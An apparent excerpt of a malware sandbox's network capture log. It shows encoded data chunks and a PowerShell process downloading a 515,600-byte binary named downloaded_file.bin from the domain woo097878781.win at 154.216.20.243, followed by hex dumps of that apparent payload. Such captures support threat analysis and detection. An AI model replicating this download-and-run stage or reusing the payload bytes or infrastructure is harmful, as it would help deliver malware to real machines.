2024-12-09 07:08:25 UTC	349	IN	Data Raw: 63 62 38 0d 0a 42 75 54 36 61 48 75 6c 4a 55 76 61 58 77 53 59 6a 65 76 76 53 33 35 37 50 7a 50 2b 64 49 6c 58 4d 4a 45 4c 75 43 7a 57 72 59 4e 39 78 6f 78 4b 51 5a 45 4a 61 61 6b 36 4a 71 4c 35 6d 5a 6f 75 55 6c 6c 65 56 39 78 4f 37 7a 5a 63 34 6d 36 55 44 71 44 41 6f 54 79 43 6d 77 51 49 77 41 6c 70 76 79 63 6d 6f 74 61 51 7a 53 34 51 57 51 55 52 6d 78 37 72 4e 6c 7a 7a 61 74 4e 44 70 73 48 67 62 6f 69 64 41 42 37 47 51 53 71 32 4d 6d 48 39 36 49 71 46 4a 52 63 57 56 31 37 63 57 4b 73 79 53 72 4d 78 6d 6d 47 7a 32 65 4a 4c 68 59 6b 44 57 64 67 4a 4d 50 67 36 61 72 71 33 79 59 34 75 48 42 64 5a 56 35 55 63 34 54 39 55 38 6d 2f 53 58 4c 2f 4c 36 32 36 47 6e 67 45 55 7a 31 55 6e 76 44 56 71 2b 2b 4b 4b 7a 57 64 63 48 6b 55 52 78 46 61 34 42 31 48 69 65 4d Data Ascii: cb8BuT6aHulJUvaXwSYjevvS357PzP+dIlXMJELuCzWrYN9xoxKQZEJaak6JqL5mZouUlleV9xO7zZc4m6UDqDAoTyCmwQIwAlpvycmotaQzS4QWQURmx7rNlzzatNDpsHgboidAB7GQSq2MmH96IqFJRcWV17cWKsySrMxmmGz2eJLhYkDWdgJMPg6arq3yY4uHBdZV5Uc4T9U8m/SXL/L626GngEUz1UnvDVq++KKzWdcHkURxFa4B1HieM
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 6e 67 51 59 79 6b 63 37 73 44 5a 74 2f 2f 32 43 68 43 51 52 47 56 42 62 6b 78 58 72 4d 6c 6a 35 5a 74 42 4b 75 63 4c 6e 5a 49 62 59 52 46 6e 41 58 32 6e 67 66 55 58 2f 2f 34 36 42 50 31 34 6a 48 55 37 53 44 36 73 79 58 72 4d 78 6d 6b 61 78 7a 4f 4a 76 69 5a 73 43 45 74 56 48 4f 37 34 77 59 2b 6a 70 6a 49 4d 6a 48 77 74 58 58 35 6f 56 34 6a 35 62 39 6d 37 65 44 76 71 50 35 6e 7a 47 77 45 6f 34 79 6b 77 6c 73 69 70 6d 75 76 44 48 6c 47 6b 62 46 52 30 4a 33 42 4c 71 4d 56 50 33 5a 39 52 4b 75 4d 6e 76 61 59 6d 65 41 42 6e 41 54 53 47 77 50 47 76 78 34 49 6d 49 4a 42 67 66 55 56 43 5a 56 71 56 31 56 65 73 70 67 67 36 61 79 4f 4a 32 78 4b 30 4a 46 38 6c 41 50 2f 67 69 4b 4f 4f 76 6a 6f 46 70 52 46 6c 54 56 4a 4d 45 36 69 64 58 2f 58 76 57 53 37 4c 43 34 6d 71 Data Ascii: ngQYykc7sDZt//2ChCQRGVBbkxXrMlj5ZtBKucLnZIbYRFnAX2ngfUX//46BP14jHU7SD6syXrMxmkaxzOJviZsCEtVHO74wY+jpjIMjHwtXX5oV4j5b9m7eDvqP5nzGwEo4ykwlsipmuvDHlGkbFR0J3BLqMVP3Z9RKuMnvaYmeABnATSGwPGvx4ImIJBgfUVCZVqV1Vespgg6ayOJ2xK0JF8lAP/giKOOvjoFpRFlTVJME6idX/XvWS7LC4mq
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 38 6c 41 50 2f 67 69 4b 4f 4f 76 6a 6f 46 70 52 46 6c 51 57 5a 6b 54 35 44 52 59 2f 57 7a 51 51 72 7a 42 34 6e 61 4a 6e 41 6f 56 7a 30 30 6b 74 6a 6c 75 38 2b 53 43 69 79 6b 64 45 78 30 66 33 42 48 7a 64 51 71 7a 58 64 31 43 75 63 43 6a 55 59 57 57 42 42 37 52 42 7a 62 32 4a 43 62 39 34 38 6e 56 61 52 41 51 58 56 71 57 45 75 73 79 58 2f 5a 71 33 55 32 35 79 4f 74 71 67 5a 77 47 45 4d 70 42 4b 62 38 35 59 2b 6a 71 67 49 45 6c 58 46 63 64 56 6f 52 57 73 33 56 39 39 48 2f 5a 59 62 66 65 36 43 53 5a 31 68 4e 5a 77 45 74 70 34 48 31 68 2f 2b 65 43 69 79 45 63 43 31 68 66 6c 78 66 68 4d 31 50 2b 5a 64 78 4f 74 63 2f 6e 61 49 61 66 44 51 76 56 51 69 2b 71 4e 79 61 30 72 34 36 56 61 55 52 5a 61 30 47 4c 42 2f 31 33 5a 2f 42 6e 31 45 6d 69 6a 2f 34 71 6e 39 67 4e Data Ascii: 8lAP/giKOOvjoFpRFlQWZkT5DRY/WzQQrzB4naJnAoVz00ktjlu8+SCiykdEx0f3BHzdQqzXd1CucCjUYWWBB7RBzb2JCb948nVaRAQXVqWEusyX/Zq3U25yOtqgZwGEMpBKb85Y+jqgIElXFcdVoRWs3V99H/ZYbfe6CSZ1hNZwEtp4H1h/+eCiyEcC1hflxfhM1P+ZdxOtc/naIafDQvVQi+qNya0r46VaURZa0GLB/13Z/Bn1Emij/4qn9gN
2024-12-09 07:08:25 UTC	176	IN	Data Raw: 75 77 4d 32 76 78 34 49 4b 66 4b 52 45 64 55 56 57 55 48 65 46 31 48 4c 4e 75 77 67 37 73 6a 39 52 70 69 5a 67 4a 44 34 64 59 5a 36 46 39 59 66 61 76 30 63 30 6c 45 68 6c 53 58 5a 41 64 34 7a 52 65 2f 57 37 66 52 37 7a 48 38 32 57 43 6b 41 73 58 79 45 59 74 76 54 68 69 2f 65 75 50 67 6d 6c 53 57 56 70 4a 33 45 36 72 47 6e 58 47 4b 2f 74 30 39 4e 43 76 66 63 61 66 42 6c 6d 66 42 79 57 37 4d 57 37 31 36 59 43 42 49 78 55 53 55 56 71 59 47 75 49 77 56 50 4a 73 33 30 2b 77 77 2b 74 69 68 5a 73 46 46 73 68 50 61 66 5a 39 0d 0a Data Ascii: uwM2vx4IKfKREdUVWUHeF1HLNuwg7sj9RpiZgJD4dYZ6F9Yfav0c0lEhlSXZAd4zRe/W7fR7zH82WCkAsXyEYtvThi/euPgmlSWVpJ3E6rGnXGK/t09NCvfcafBlmfByW7MW716YCBIxUSUVqYGuIwVPJs30+ww+tihZsFFshPafZ9
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 33 63 36 34 0d 0a 59 65 4b 76 30 63 30 4d 43 78 4a 54 56 39 77 4a 70 53 77 53 39 47 57 61 46 76 54 44 36 47 4b 41 6e 51 59 59 77 55 38 73 73 44 6c 6e 2f 4f 6d 4b 67 69 30 5a 47 46 4a 56 6b 42 6a 68 4e 46 50 2f 59 74 56 46 73 59 2b 76 4a 49 47 41 53 6b 47 48 64 69 71 75 4b 6e 62 32 72 35 62 44 4d 46 77 65 55 52 48 45 56 75 6f 6e 57 50 6c 6e 33 30 47 78 7a 4f 35 6a 69 35 34 47 45 38 35 50 4c 37 63 30 64 50 6e 6a 68 34 6f 6e 45 42 64 51 57 35 38 62 71 33 73 53 39 48 47 61 46 76 54 6a 35 6d 6d 6f 6b 77 59 65 68 31 68 6e 6f 58 31 68 39 71 2f 52 7a 53 55 57 46 56 52 52 6c 52 50 6a 50 6c 76 32 61 4e 46 4c 74 38 6e 73 61 34 2b 4b 41 42 72 4a 52 43 57 30 4f 32 66 35 2f 59 47 45 61 56 4a 5a 57 6b 6e 63 54 71 73 55 58 50 35 39 33 56 37 30 30 4b 39 39 78 70 38 47 57 Data Ascii: 3c64YeKv0c0MCxJTV9wJpSwS9GWaFvTD6GKAnQYYwU8ssDln/OmKgi0ZGFJVkBjhNFP/YtVFsY+vJIGASkGHdiquKnb2r5bDMFweURHEVuonWPln30GxzO5ji54GE85PL7c0dPnjh4onEBdQW58bq3sS9HGaFvTj5mmokwYeh1hnoX1h9q/RzSUWFVRRlRPjPlv2aNFLt8nsa4+KABrJRCW0O2f5/YGEaVJZWkncTqsUXP593V700K99xp8GW
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 34 63 79 62 39 39 38 6e 56 61 54 55 65 54 31 2b 4d 56 76 52 37 53 37 4e 75 31 67 37 73 6a 2b 56 75 69 5a 77 4e 46 63 46 43 4c 37 55 38 61 66 76 76 68 6f 6b 69 46 52 39 63 58 4a 6b 62 37 79 64 59 2b 47 62 57 52 37 6a 43 6f 53 72 47 6e 78 4a 5a 6e 77 63 59 74 54 4e 6f 2f 66 6e 4a 6b 6d 63 46 57 56 70 64 33 45 36 72 4e 46 37 38 61 74 56 4e 74 38 37 72 64 70 53 55 41 78 48 43 53 79 4b 32 4f 33 54 38 34 49 43 4f 4b 68 55 65 56 56 32 57 46 65 78 31 48 4c 4e 75 77 67 37 73 6a 38 4a 7a 6c 70 56 4b 42 6f 6c 65 61 62 38 78 4a 71 4b 76 67 59 41 68 46 68 31 61 58 4a 73 51 34 69 64 62 39 6d 66 61 53 72 2f 41 35 32 43 46 6d 42 67 66 77 30 38 71 74 54 42 6f 2b 65 76 4a 77 32 6b 62 41 52 30 4a 33 43 54 6d 4f 30 6e 38 62 73 74 45 39 4e 43 76 66 63 61 66 42 6c 6d 66 42 79 Data Ascii: 4cyb998nVaTUeT1+MVvR7S7Nu1g7sj+VuiZwNFcFCL7U8afvvhokiFR9cXJkb7ydY+GbWR7jCoSrGnxJZnwcYtTNo/fnJkmcFWVpd3E6rNF78atVNt87rdpSUAxHCSyK2O3T84ICOKhUeVV2WFex1HLNuwg7sj8JzlpVKBoleab8xJqKvgYAhFh1aXJsQ4idb9mfaSr/A52CFmBgfw08qtTBo+evJw2kbAR0J3CTmO0n8bstE9NCvfcafBlmfBy
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 38 65 79 47 69 53 38 59 46 6c 31 61 6c 52 66 74 4d 46 6a 34 62 39 64 4e 73 73 6d 68 4b 73 61 66 45 6c 6d 66 42 77 6d 6a 4d 47 72 39 72 35 62 44 4d 46 77 65 55 52 48 45 56 75 41 35 56 76 52 70 31 30 32 38 79 75 56 75 67 35 67 43 43 38 39 48 4c 71 6f 76 5a 76 50 71 68 59 34 70 47 42 39 55 56 35 38 53 71 33 73 53 39 48 47 61 46 76 54 69 37 57 4f 76 6e 78 46 5a 32 41 6b 77 2b 44 70 71 75 72 66 4a 6a 43 49 57 46 6c 42 53 6d 68 58 67 4d 46 6a 79 62 74 4a 44 70 73 7a 75 61 34 4b 59 42 52 2f 42 52 69 61 2b 4f 6d 2f 37 35 34 37 4e 5a 31 77 65 52 52 48 45 56 73 55 79 55 66 63 70 78 51 43 74 6a 2b 5a 6f 78 73 42 4b 47 63 31 4e 49 37 59 39 59 65 6a 70 67 49 30 71 44 68 70 62 57 5a 6f 61 35 7a 68 61 2b 6d 6e 66 52 62 6e 45 37 47 4b 47 6b 77 74 5a 69 51 63 75 6f 48 30 Data Ascii: 8eyGiS8YFl1alRftMFj4b9dNssmhKsafElmfBwmjMGr9r5bDMFweURHEVuA5VvRp1028yuVug5gCC89HLqovZvPqhY4pGB9UV58Sq3sS9HGaFvTi7WOvnxFZ2Akw+DpqurfJjCIWFlBSmhXgMFjybtJDpszua4KYBR/BRia+Om/7547NZ1weRRHEVsUyUfcpxQCtj+ZoxsBKGc1NI7Y9YejpgI0qDhpbWZoa5zha+mnfRbnE7GKGkwtZiQcuoH0
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 64 56 35 54 6b 49 49 41 73 74 47 75 53 6f 63 36 69 6e 4d 44 75 79 64 72 79 53 55 32 46 4a 5a 67 45 51 37 71 6a 74 6c 37 4f 7a 4f 73 78 63 37 41 31 42 58 69 77 66 56 43 31 58 70 5a 4e 78 5a 70 59 50 30 5a 34 69 57 44 51 2b 48 43 57 6d 33 66 54 37 44 72 38 48 4e 46 6c 4a 5a 52 52 48 45 56 74 34 32 58 50 31 75 7a 46 2f 35 36 50 74 70 67 49 38 62 57 59 6b 48 4c 2f 68 6c 4e 72 53 76 6a 5a 78 70 52 45 6b 50 43 73 6c 46 76 47 55 41 37 43 66 44 44 71 4b 50 75 54 62 49 32 42 68 5a 6e 77 64 75 75 79 39 30 2f 4f 79 66 6a 6d 34 69 4a 33 4e 57 6d 68 50 73 4a 52 44 64 59 73 35 4a 39 49 47 68 61 38 62 41 4d 31 6d 50 42 78 62 32 66 58 36 36 74 38 6d 34 4b 68 49 58 57 6b 65 4e 57 38 55 79 56 50 5a 75 79 67 79 61 78 50 56 6a 78 74 5a 4b 48 34 63 66 65 66 5a 39 59 75 75 76 Data Ascii: dV5TkIIAstGuSoc6inMDuydrySU2FJZgEQ7qjtl7OzOsxc7A1BXiwfVC1XpZNxZpYP0Z4iWDQ+HCWm3fT7Dr8HNFlJZRRHEVt42XP1uzF/56PtpgI8bWYkHL/hlNrSvjZxpREkPCslFvGUA7CfDDqKPuTbI2BhZnwduuy90/Oyfjm4iJ3NWmhPsJRDdYs5J9IGha8bAM1mPBxb2fX66t8m4KhIXWkeNW8UyVPZuygyaxPVjxtZKH4cfefZ9Yuuv
2024-12-09 07:08:25 UTC	1369	IN	Data Raw: 73 6e 59 33 61 53 45 65 6f 6a 51 75 52 6d 6c 57 43 43 37 74 39 61 6b 35 73 45 46 38 42 52 4f 50 68 7a 4a 76 57 76 30 62 52 70 56 46 6c 69 48 39 77 4f 71 32 30 53 78 6d 72 55 51 4c 50 5a 38 43 6d 68 6c 67 30 59 30 56 63 2b 74 33 4a 49 7a 4d 37 4a 77 32 6b 61 57 51 55 44 30 6c 62 76 4a 42 4b 72 4f 59 67 56 34 5a 79 32 4e 4e 53 48 52 41 43 48 55 57 6e 67 62 79 69 36 2f 63 6e 56 61 56 73 61 54 30 4f 61 46 66 30 32 46 63 31 58 2f 55 43 7a 7a 76 64 30 69 35 51 72 47 74 5a 4e 46 34 59 6f 5a 66 54 68 6a 70 73 34 58 46 63 64 58 74 78 4f 30 6e 55 61 73 31 61 55 44 71 79 50 75 53 53 7a 6d 77 51 58 77 46 45 34 39 52 70 6f 2f 65 36 66 6e 53 51 51 4f 46 35 41 6c 6c 61 6c 64 56 53 7a 4d 59 67 41 39 4d 76 77 4a 4e 37 49 57 45 4b 53 46 48 37 6f 62 33 6d 30 39 73 6d 62 61 Data Ascii: snY3aSEeojQuRmlWCC7t9ak5sEF8BROPhzJvWv0bRpVFliH9wOq20SxmrUQLPZ8Cmhlg0Y0Vc+t3JIzM7Jw2kaWQUD0lbvJBKrOYgV4Zy2NNSHRACHUWngbyi6/cnVaVsaT0OaFf02Fc1X/UCzzvd0i5QrGtZNF4YoZfThjps4XFcdXtxO0nUas1aUDqyPuSSzmwQXwFE49Rpo/e6fnSQQOF5AllaldVSzMYgA9MvwJN7IWEKSFH7ob3m09smba

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49786	154.216.20.243	443	2188	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:23 UTC	180	OUT	GET /downloaded_file.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: woo097878781.win Connection: Keep-Alive
2024-12-09 07:08:24 UTC	270	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:08:24 GMT Content-Type: application/octet-stream Content-Length: 515600 Last-Modified: Tue, 03 Dec 2024 18:46:46 GMT Connection: close ETag: "674f5216-7de10" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-12-09 07:08:24 UTC	16114	IN	Data Raw: 2e 0c eb e5 fe 51 53 1e 6f 1d b2 28 87 2a e1 8c f3 2c 26 02 f3 81 9b 35 82 5b 91 fb dc cd 0e fa ad 82 31 59 82 ff b6 b7 81 c5 e9 eb 21 76 36 67 6b aa 7f 50 fc fa 16 fc 10 fa 5f 9e 0a b2 fc db 15 50 63 7e fa d9 56 9b 5f 51 a5 28 4e 0e 99 6a 0a a8 f8 bb 0e 69 a0 d8 72 1c 78 8b 7b 10 66 58 dd 68 79 2e 5c 71 32 83 aa fb bd 26 ee 69 f0 86 3a 29 d5 65 fa 90 2b 96 da 7b c1 67 3b b2 fd 14 3f 8f 4b 92 e9 7c 36 83 dd 20 f8 35 15 1a c0 00 f5 e3 d1 d8 93 f5 49 c8 52 47 c8 9f 5b b7 9f 36 c7 de 76 82 00 9e 3a d9 45 db 98 eb 29 3f af ae 91 fd 98 0c 4d 89 b9 60 f0 a0 a0 77 ff a8 fc b4 7a e1 9a 5b 66 88 43 e1 20 01 12 3f d5 d5 ac 6f 1f 2c 95 0a 1b fb 78 96 cf 6b b4 18 4f dd 31 b8 ac 36 cd ca 89 ea 8b 41 b6 a7 b1 de 12 dd 67 6d 84 c5 40 e2 fa d3 49 09 89 26 16 e1 06 27 ca Data Ascii: .QSo(*,&5[1Y!v6gkP_Pc~V_Q(Njirx{fXhy.\q2&i:)e+{g;?K\|6 5IRG[6v:E)?M`wz[fC ?o,xkO16Agm@I&'
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 8c 15 2f 34 a5 d7 35 3e bf 3c d8 89 78 cb 90 b2 e5 c4 92 d7 2d 5f f3 8a 36 64 02 ad 9e 1c a5 1a 80 94 05 5b 1a ee 74 67 74 40 3b 0a 1f 87 3c 3f f2 2a 83 c9 41 0a 9d 10 ab 5a a2 5d 87 10 49 1a e9 34 75 12 7a 2e dd 8b 1a 68 d3 71 ec 36 41 a5 0a 23 c9 41 83 fb 6e 40 e6 f9 a1 d1 30 51 8a 9c 75 5c d4 26 ed 71 ec 62 0c 70 55 35 0b 2d 99 be cc 8a 2a ea 32 99 3c 32 36 9a f8 a8 58 96 8e 39 d1 90 61 58 22 4e 35 2a 9d 47 cf 1c a1 fe 1e fb b4 7f a7 ad 2f 73 dc 4f 4c 7a 42 14 34 97 ea 6c 50 d8 1c ad 91 8e 8b 49 e4 70 13 1d c6 67 d0 cd d7 a9 98 d6 46 6f f0 da db 18 45 36 cf d3 2f 08 de d5 23 e2 4b 14 fb f4 85 aa e2 bc ef 67 76 47 c7 6f 8e 0b dd 73 5d f1 f6 79 cf e0 cd e4 76 d8 40 4e a0 41 f9 0d b9 2b a8 6c ea 6e 38 d7 6f 85 1c e7 7f bf 9f 35 66 a3 79 ac b4 1b 51 2a 11 Data Ascii: /45><x-_6d[tgt@;<?AZ]I4uz.hq6A#An@0Qu\&qbpU5-2<26X9aX"N5G/sOLzB4lPIpgFoE6/#KgvGos]yv@NA+ln8o5fyQ
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 77 44 cc 55 d1 3d 87 bf 1a cd a3 dc 09 1e 03 48 d2 63 e4 fd 16 02 8b 35 46 16 d1 71 0a fb 48 45 d7 65 0c e4 3f 16 71 5a a7 8f 4a 34 9d db ac 23 24 b4 f1 f4 fe ce ff f4 8d bf bd 13 73 d7 6f e0 aa d8 49 af ed 20 5b f0 7a 6f 13 72 90 03 52 f8 fb a8 87 6d 01 ab b0 af 0a 29 ca a2 72 8e 8a c4 5a 08 80 6a 72 81 6d 24 35 60 5b 2f 63 42 ba f7 a1 d9 c4 f6 31 be 08 13 c0 3c 47 05 ca 1f 7c 28 38 0d c9 57 4e 4e 73 cb d0 d3 e4 94 9d 70 08 e1 6d 44 20 4b bf 81 f2 95 b8 c4 83 f1 ad c6 0b 96 0b 32 2e ce 8c 47 a2 ff 64 57 7c 24 3a ad a4 ca 7e 82 cb 2c 70 2e ad 80 09 24 2d 34 bd 7e 6a 88 2b fa d3 c4 bc ca 90 e7 87 5e 97 94 d9 1f c2 20 b8 35 b5 91 03 3c cf 86 35 3e b4 f2 b1 c9 10 c8 9c f6 f8 14 bb 71 48 a5 36 00 5c db 5e 9c 24 80 c7 33 0d 82 34 d2 b1 fb b0 14 84 3f 7d a4 9b Data Ascii: wDU=Hc5FqHEe?qZJ4#$soI [zorRm)rZjrm$5`[/cB1<G\|(8WNNspmD K2.GdW\|$:~,p.$-4~j+^ 5<5>qH6\^$34?}
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: fb a5 8f 4e 3d 74 95 bc e4 1b 3d b0 55 a6 7f 3b 9a 97 80 1e be 13 2d d4 2c ac 4e 8b 21 c0 bc 74 5d 2a b9 00 b8 f7 8d 58 5d 7c b4 2c 5e 44 ec 39 7c 75 60 38 8a b0 d2 91 de f2 43 c7 bf 94 49 14 31 d3 2e cc 2c 16 86 ab c0 56 f1 21 ec 31 9a 2e 73 ba af 17 24 f7 cc 8d 68 14 78 49 d8 0a df 8e 5d 56 bf 86 10 78 66 fb a9 74 72 62 ff fb f2 cc dc 43 c0 66 d9 d2 69 9d 33 8d 18 23 00 b6 7e d2 0a 16 82 72 2a 3a 9b 9e 49 d4 70 7e 7f 2a 73 a5 09 0b 72 89 bc b5 c1 70 e2 71 ca 9c a0 6a 8b ea be 6b 16 83 c7 34 e5 39 3c 05 c3 44 93 39 fd b7 8f 20 dc 20 75 d7 f3 04 e3 39 64 ae ea 46 f7 86 ee 26 26 d4 cb 65 67 8d eb 55 30 0d a9 f5 b2 82 35 05 d4 18 13 94 d2 9a 15 fb 3f 4c 97 96 a8 ba 24 6a 28 c9 5b ed e3 33 9e c7 67 d0 7a a8 36 c2 37 29 68 4d 39 b3 a2 02 71 62 11 74 26 37 fa Data Ascii: N=t=U;-,N!t]X]\|,^D9\|u`8CI1.,V!1.s$hxI]VxftrbCfi3#~r:Ip~*srpqjk49<D9 u9dF&&egU05?L$j([3gz67)hM9qbt&7
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 9f e1 12 13 7a 42 b8 4c 70 71 f8 28 76 2f 9b ce e2 b0 71 ea c6 c4 0f 88 2d 12 1f a4 c9 6f 11 fa 35 f2 b5 ab 01 2e 70 2a eb b6 d0 94 3d 11 fb ca 58 3f e5 bf b6 8d ab 75 0e 5a 41 29 9a 63 5d 9e 20 64 0b 3b 3a ea eb 56 ef 21 eb ab a2 11 ba a6 ad e1 9e a3 2a c4 cd 15 d0 29 c1 1a db b7 1e 17 ef 4d ea e3 d1 9b e7 00 19 2a e8 77 6b 85 0d 16 e8 f7 d6 a8 e6 e7 bc c3 49 b9 b1 e0 80 5b 82 c5 7c ed 65 cb 19 82 52 b8 ee 21 ed 20 c2 3a 14 88 84 6a ef 9c 8d a0 c3 8f a8 dd 08 f3 2a 58 19 fe 0b a2 f3 a9 89 d2 a0 ba 20 b4 5f 0c 86 a4 44 f2 17 2c ba 36 e0 8f ff 49 35 99 d0 a1 49 3e 55 0e 25 80 23 af 61 4c 29 6a ae 72 d2 c6 ca 18 85 4c b6 b5 0c 56 e5 82 e4 06 b8 be 42 8b ff 68 62 1e b2 b0 81 fe c9 e7 b3 25 17 6d 86 2e c8 8a fb 10 26 e6 d6 77 7f 5e 2c fe f4 99 a8 e3 f1 c9 aa Data Ascii: zBLpq(v/q-o5.p=X?uZA)c] d;:V!)MwkI[\|eR! :jX _D,6I5I>U%#aL)jrLVBhb%m.&w^,
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 86 90 1d 44 42 9e 9e b7 df c0 fc 4b 24 3b 49 c6 df f6 f3 3f de 4f f1 ad 49 e5 94 78 10 b5 28 78 f7 31 1f 26 42 f9 d6 49 0f 1f 08 d7 88 01 f8 4f 9d 88 f1 6e 41 c4 fe d2 40 9a 78 c3 21 3f e6 54 93 4f a0 10 cd a7 14 c4 58 22 7e 82 ef 66 2e d0 a9 62 62 45 aa 8a 7c c3 10 95 9f 4d ff 39 9d 09 ba 78 f4 76 64 e1 f7 82 c2 94 15 57 a9 87 a6 9a b2 6a 63 c9 33 e5 2e a2 98 e8 96 69 ee 0d 8a 69 0c cb 59 f3 10 69 af 9d 69 27 1a 8b 0d 9e b0 e9 3b c9 96 38 12 34 fc 59 59 bb 29 90 b4 6c a8 8d ac 42 57 d8 c7 b2 d3 e5 bc 7a c9 e8 a6 38 9e 3f de ab e6 6a a2 2e 8d 53 f4 b7 52 e1 7b 5d 8c b0 a6 c0 fd 0a 22 c9 4a 23 77 15 8f ee ce e2 bc 86 25 5c 60 3e 35 3a f0 7e 57 0f ef d7 04 df 32 8c 86 2b 15 a3 58 7e e1 88 b9 ea fb 41 9c 7b 4c 25 6a 7e 7b e0 49 0a 37 c3 87 f0 f6 39 2d a5 14 Data Ascii: DBK$;I?OIx(x1&BIOnA@x!?TOX"~f.bbE\|M9xvdWjc3.iiYii';84YY)lBWz8?j.SR{]"J#w%\`>5:~W2+X~A{L%j~{I79-
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 1b 71 e4 65 12 a3 0e 09 a9 9e ce 01 8d 50 66 7b b8 49 00 44 81 6b 18 ac 44 ac fb 81 a6 1e d2 90 95 f6 2b f1 f1 aa b8 dd d5 34 76 3a 16 7e 70 d4 f1 79 be 22 50 b5 3a f3 5f 48 e9 af 0d 4f 5f 78 71 00 a3 5f 42 f8 67 24 85 1d b3 fa ed 45 49 75 1a cf ec 38 3f 14 28 21 20 eb 36 3d 7a dc f7 92 30 73 f3 02 4c 91 75 8b 29 d1 a7 9c 5a 46 15 3d e1 35 1b e6 ee 5b 91 c0 c0 06 a0 24 58 a2 7b df 0d a7 2c 1c 4e 5a f0 49 b2 44 24 25 76 3b 9b 19 5d d2 ec 9c 9d 39 56 75 55 78 0f ee fa 2a 36 57 af a1 57 d9 72 61 a6 96 1c 71 84 fb 7f ca d1 37 6e f6 13 91 cd 2c 21 be 56 d9 38 6e 31 c6 29 c4 cc f2 69 0e 7d 20 df 37 5b 7d ae ac 23 3c 23 96 58 77 5c 97 11 b3 2d c3 dc c4 a4 21 7e a9 be 92 44 3a eb 6c fe 77 9f 82 8e f3 0c b5 81 65 4e df 4e e8 32 a1 5a e8 b6 7c da ac fb 0c ce a8 10 Data Ascii: qePf{IDkD+4v:~py"P:_HO_xq_Bg$EIu8?(! 6=z0sLu)ZF=5[$X{,NZID$%v;]9VuUx*6WWraq7n,!V8n1)i} 7[}#<#Xw\-!~D:lweNN2Z\|
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 63 56 1d ab 8d 68 f7 05 e7 4b 47 30 4c 8d 81 e5 3f 2c 84 53 f8 ea 71 36 b9 d8 1e 42 14 cb 56 5f f8 52 0c 5c 6b 27 7e 12 ba 8b ec 8c 50 d6 2b dc 8f 5d 10 b4 cb af 7d 0f bf 7b 0d 7d c9 58 db f4 06 fc 09 f6 d9 c4 e1 9a db 62 42 ce 27 14 05 4c 70 93 e2 d1 27 b4 0f 3c 6b 96 c7 bb 4a 7d 40 bf 18 95 46 87 c4 f6 7b da af dc 7d 39 e8 48 5a 4d 3a c2 df 55 66 04 cd 00 82 8a 2f fc d5 e2 e5 08 85 90 3f b6 7b 74 97 e8 94 85 dd 90 c4 3e 9d 1a 4f 11 13 06 21 56 ea 31 7c 4c cf 01 da 47 00 ff a1 2e 78 41 3d 9f b6 69 32 75 50 42 9f 2a 76 3c 71 dd 55 0c fc c2 46 ab bc 34 3b c9 c9 40 0e 15 c1 60 f0 66 44 2e ef 6e 75 99 b8 0a e3 74 b5 09 1b 5b 26 cb 37 b5 f1 63 bb 47 3f cb 80 46 95 be ac 8a 54 7d 9f 1e e2 73 f7 6e 2d 24 88 09 e2 36 d5 5d 58 47 f9 97 28 a1 82 23 8a ec 8c 1d af Data Ascii: cVhKG0L?,Sq6BV_R\k'~P+]}{}XbB'Lp'<kJ}@F{}9HZM:Uf/?{t>O!V1\|LG.xA=i2uPB*v<qUF4;@`fD.nut[&7cG?FT}sn-$6]XG(#
2024-12-09 07:08:24 UTC	16384	IN	Data Raw: 20 7b 1d 64 91 3a dd ec 6c 9d cd 6f 3c 7b f3 05 64 9f 3a e9 13 ef af 5b 6b fb 73 4a 45 08 ce 8b 26 b5 c8 55 18 87 30 51 d0 e8 bb 80 a3 46 95 90 ab 7e 7c 82 a9 b8 4b 49 05 4c 2f f9 a6 44 f8 05 9f c2 0a fb d7 77 9d 12 a1 89 9a 3d 29 5f a8 1c 2b 9e 19 1f d1 01 c9 32 93 b3 4e 7a 21 1a e7 5c ed 35 cc e1 bf 22 50 da 19 9f 10 15 e5 1d 69 f8 77 06 45 b8 fd 62 26 77 22 1e 4d 96 bf 5f 5f 81 c0 50 3d 36 7b bc 78 ba a3 50 e5 51 15 b6 1a c2 0a fe a7 ac 26 19 b4 60 f6 9d 76 50 6b 70 5c eb 7f 68 73 c9 f3 2c 8b 86 51 2d 02 32 a8 3c 25 bb af cb 69 23 87 11 26 6a 5d ca 3a ae 0d 39 48 4d 8f 14 cb 9c 47 70 dc 7a bb 50 55 27 ce f2 a4 99 56 0f 29 d0 d5 ec e2 f9 88 12 e3 3b 24 69 b8 53 a2 d8 17 f6 dc 9b 2d 1a 25 84 a7 e5 0d 8c 05 02 1f 93 36 69 30 08 5f 7b 68 f9 1e 45 a4 74 7a Data Ascii: {d:lo<{d:[ksJE&U0QF~\|KIL/Dw=)_+2Nz!\5"PiwEb&w"M__P=6{xPQ&`vPkp\hs,Q-2<%i#&j]:9HMGpzPU'V);$iS-%6i0_{hEtz
